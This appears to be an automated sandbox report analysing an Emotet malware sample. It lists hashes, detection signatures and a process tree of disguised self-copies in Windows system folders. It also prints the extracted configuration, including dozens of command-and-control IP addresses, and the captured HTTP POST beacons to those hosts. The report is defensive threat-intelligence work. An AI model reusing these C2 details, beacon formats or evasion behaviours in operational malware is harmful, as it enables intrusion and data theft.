Analysis Report MV9tCJw8Xr

Overview

General Information

Sample Name: MV9tCJw8Xr (renamed file extension from none to exe)
Analysis ID: 356776
MD5: b12817c1c8ba085a7a82655fba90e53d
SHA1: 1f56268ada7ef3e7b788121cfa2ca1879cf70f1e
SHA256: 61e37534bfb2acbb787788100b1932f5011cbc98db86ce10b7a8a730d2a4de35

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • MV9tCJw8Xr.exe (PID: 6552 cmdline: 'C:\Users\user\Desktop\MV9tCJw8Xr.exe' MD5: B12817C1C8BA085A7A82655FBA90E53D)
    • KBDHEB.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe MD5: B12817C1C8BA085A7A82655FBA90E53D)
      • tokenbinding2.exe (PID: 6176 cmdline: 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA= MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
        • KBDHEB.exe (PID: 3596 cmdline: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
          • execmodelproxy.exe (PID: 3316 cmdline: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
            • COLORCNV.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
              • usp10.exe (PID: 5260 cmdline: C:\Windows\SysWOW64\glu32\usp10.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                • KBDINTAM.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                  • msrd2x40.exe (PID: 2772 cmdline: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                    • MCCSEngineShared.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                      • jscript9.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                        • wmvdspa.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\ftp\wmvdspa.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                          • msvcr100_clr0400.exe (PID: 7028 cmdline: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                            • catsrvut.exe (PID: 5652 cmdline: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
                              • mprdim.exe (PID: 1856 cmdline: C:\Windows\SysWOW64\d3dramp\mprdim.exe MD5: 13B9D586BB973AC14BFA24E4AE7B24F1)
  • svchost.exe (PID: 6836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5676 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5532 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4924 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5452 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2828 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4620 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 204 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAK0tD7DHdiTSfIU1WweFow3PfGxe/CRZ\n7RfHk7MnaOjnNJew7LHRiqSJHrLuGCM9Hhwr6X6Fo6BovhbAzlkBAKvDbpyms/Eq\nTV9arC8ISLFmyZS1gzLyBcE4wYE3YM5tzQIDAQAB", "C2 list": ["80.158.59.174:8080", "80.158.43.136:80", "80.158.3.161:443", "80.158.51.209:8080", "80.158.35.51:80", "80.158.63.78:443", "80.158.53.167:80", "58.27.215.3:8080", "75.127.14.170:8080", "198.20.228.9:8080", "37.205.9.252:7080", "120.51.34.254:80", "41.185.29.128:8080", "172.105.78.244:8080", "175.103.38.146:80", "190.164.135.81:80", "183.91.3.63:80", "109.13.179.195:80", "77.74.78.80:443", "126.126.139.26:443", "58.94.58.13:80", "162.144.145.58:8080", "197.221.227.78:80", "180.148.4.130:8080", "203.56.191.129:8080", "103.229.73.17:8080", "113.203.238.130:80", "188.166.220.180:7080", "152.32.75.74:443", "178.254.36.182:8080", "5.2.164.75:80", "42.200.96.63:80", "202.29.237.113:8080", "190.192.39.136:80", "103.93.220.182:80", "109.99.146.210:8080", "187.193.221.143:80", "116.202.10.123:8080", "46.105.131.68:8080", "50.116.78.109:8080", "181.59.59.54:80", "185.208.226.142:8080", "188.80.27.54:80", "2.58.16.86:8080", "192.241.220.183:8080", "95.76.142.243:80", "203.153.216.178:7080", "157.7.164.178:8081", "200.243.153.66:80", "195.201.56.70:8080", "73.55.128.120:80", "190.85.46.52:7080", "213.165.178.214:80", "143.95.101.72:8080", "41.76.213.144:8080", "178.33.167.120:8080", "201.163.74.203:80", "185.142.236.163:443", "121.117.147.153:443", "190.212.140.6:80", "60.108.128.186:80", "177.130.51.198:80", "54.38.143.245:8080", "179.5.118.12:80", "109.206.139.119:80", "192.210.217.94:8080", "85.246.78.192:80", "45.239.204.100:80", "185.80.172.199:80", "91.75.75.46:80", "2.82.75.215:80", "115.79.195.246:80", "190.55.186.229:80", "8.4.9.137:8080", "91.83.93.103:443", "192.163.221.191:8080", "117.2.139.117:443", "78.90.78.210:80", "153.229.219.1:443", "110.37.224.243:80", "115.79.59.157:80", "37.46.129.215:8080", "5.79.70.250:8080", "153.204.122.254:80", 
"74.208.173.91:8080", "139.59.61.215:443", "119.228.75.211:80", "189.123.103.233:80", "190.194.12.132:80", "223.17.215.76:80", "73.100.19.104:80", "79.133.6.236:8080", "103.80.51.61:8080", "172.96.190.154:8080", "5.2.246.108:80"]}

Yara Overview

Memory Dumps

Source: 0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmp  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
Source: 0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmp  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
Source: 0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmp  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
Source: 0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmp  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
Source: 00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmp  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
(37 entries in total)

Unpacked PEs

Source: 32.2.jscript9.exe.400000.0.unpack  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
Source: 2.2.KBDHEB.exe.5b053f.2.unpack  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
Source: 30.2.msrd2x40.exe.400000.0.unpack  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
Source: 22.2.tokenbinding2.exe.400000.0.unpack  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
Source: 37.2.catsrvut.exe.2ae279e.3.unpack  Rule: JoeSecurity_Emotet  Description: Yara detected Emotet  Author: Joe Security
(69 entries in total)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: MV9tCJw8Xr.exe  Avira: detected
Found malware configuration
Source: 23.2.KBDHEB.exe.2b6279e.3.raw.unpack  Malware Configuration Extractor: Emotet (configuration listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe  Metadefender: Detection: 54%
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe  ReversingLabs: Detection: 92%
Multi AV Scanner detection for submitted file
Source: MV9tCJw8Xr.exe  Virustotal: Detection: 66%
Source: MV9tCJw8Xr.exe  Metadefender: Detection: 56%
Source: MV9tCJw8Xr.exe  ReversingLabs: Detection: 77%
Machine Learning detection for dropped file
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe  Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.KBDHEB.exe.5b053f.2.unpack  Avira: Label: TR/Crypt.XPACK.Gen2
Source: 1.2.MV9tCJw8Xr.exe.218053f.2.unpack  Avira: Label: TR/Crypt.XPACK.Gen2
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe  Code function: 2_2_021D1D83 CryptDecodeObjectEx,
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe  Code function: 22_2_00401000 GetProcessHeap,RtlAllocateHeap,CryptStringToBinaryW,CryptStringToBinaryW,

Compliance:

Uses 32bit PE files
Source: MV9tCJw8Xr.exe  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\MV9tCJw8Xr.exe  Code function: 1_2_021E28D9 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe  Code function: 2_2_021D28D9 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe  Code function: 22_2_00A58C57 FindFirstFileExW,
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe  Code function: 22_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe  Code function: 23_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe  Code function: 26_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe  Code function: 27_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor  IPs: the C2 IP:port list given under Malware Configuration above
Connects to several IPs in different countries
Source: unknown  Network traffic detected: IP country count 35
Detected TCP or UDP traffic on non-standard ports
Source: global traffic  TCP traffic: 192.168.2.7:49734 -> 79.143.178.194:8080
Source: global traffic  TCP traffic: 192.168.2.7:49742 -> 87.106.136.232:8080
Source: global traffic  TCP traffic: 192.168.2.7:49752 -> 87.106.139.101:8080
IP address seen in connection with other malware
Source: Joe Sandbox View  IP Address: 143.95.101.72
Internet Provider seen in connection with other malware
Source: Joe Sandbox View  ASN Name: GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View  ASN Name: CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN
Source: Joe Sandbox View  ASN Name: OCNNTTCommunicationsCorporationJP
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic  TCP traffic: 192.168.2.7:49726 -> 190.144.18.198:80
Uses a known web browser user agent for HTTP communication
Source: global traffic  HTTP traffic detected:
POST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1
Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/
Content-Type: multipart/form-data; boundary=---------------------------270479976396707
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 87.106.139.101:8080
Content-Length: 4596
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic  HTTP traffic detected:
POST /LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/ HTTP/1.1
Referer: http://87.106.139.101/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/
Content-Type: multipart/form-data; boundary=---------------------------478597482596704
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 87.106.139.101:8080
Content-Length: 4596
Connection: Keep-Alive
Cache-Control: no-cache
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe; Code function: 2_2_021D2014 InternetReadFile,
                      Source: svchost.exe, 00000014.00000003.400693153.000002847D776000.00000004.00000001.sdmp; String found in binary or memory: [long string omitted]
                      Source: svchost.exe, 00000014.00000002.413767165.000002847D713000.00000004.00000001.sdmp; String found in binary or memory: [long string omitted] equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000014.00000002.413767165.000002847D713000.00000004.00000001.sdmp; String found in binary or memory: [long string omitted] equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp; String found in binary or memory: [long string omitted]
                      Source: svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmp; String found in binary or memory: [long string omitted]
                      Source: svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp; String found in binary or memory: [long string omitted]
                      Source: unknown | HTTP traffic detected: POST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1 Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ Content-Type: multipart/form-data; boundary=---------------------------270479976396707 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 87.106.139.101:8080 Content-Length: 4596 Connection: Keep-Alive Cache-Control: no-cache
                      Source: KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmp | String found in binary or memory: http://190.144.18.198/7I6ErDP3TXIbpPVjGt/
                      Source: KBDHEB.exe, 00000002.00000002.410251484.0000000002396000.00000004.00000001.sdmp | String found in binary or memory: http://190.144.18.198/7I6ErDP3TXIbpPVjGt/oM
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://79.143.178.194:8080/OBOuz0RiXji/d5wQYa4TTiE8mhM/tWmQkXn/eT4anGr2w20EB/5Z2vttar3W/LDWHDNq9fsv2
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/e
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/l
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://87.106.136.232:8080/tykkNBM8k7Mh3VVh/JyRkf2GiuhU/36unp6rB6/u
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://87.106.139.101:8080/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/_o
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://87.106.139.101:8080/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJj
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://87.10A
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp | String found in binary or memory: http://87.10AA
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: svchost.exe, 00000014.00000002.413733181.000002847D5F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                      Source: svchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmp | String found in binary or memory: http://www.hulu.com/privacy
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmp | String found in binary or memory: http://www.hulu.com/terms
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/contact/
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399513122.000002847D761000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/parents/
                      Source: svchost.exe, 00000009.00000003.305925778.000001BC4BC5A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000009.00000003.305911439.000001BC4BC47000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000009.00000003.305925778.000001BC4BC5A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000009.00000002.306397657.000001BC4BC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000009.00000002.306408621.000001BC4BC62000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000009.00000003.305880511.000001BC4BC61000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp | String found in binary or memory: https://en.help.roblox.com/hc/en-us
                      Source: svchost.exe, 00000014.00000003.392756849.000002847D75D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392907537.000002847D7BC000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.392873654.000002847D77F000.00000004.00000001.sdmp | String found in binary or memory: https://instagram.com/hiddencity_
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000009.00000002.306367566.000001BC4BC3C000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.306308761.000001BC4BC13000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000009.00000003.305990184.000001BC4BC56000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000009.00000003.283903786.000001BC4BC31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000009.00000003.305999257.000001BC4BC41000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmp | String found in binary or memory: https://www.hulu.com/ca-privacy-rights
                      Source: svchost.exe, 00000014.00000003.391438598.000002847D759000.00000004.00000001.sdmp | String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
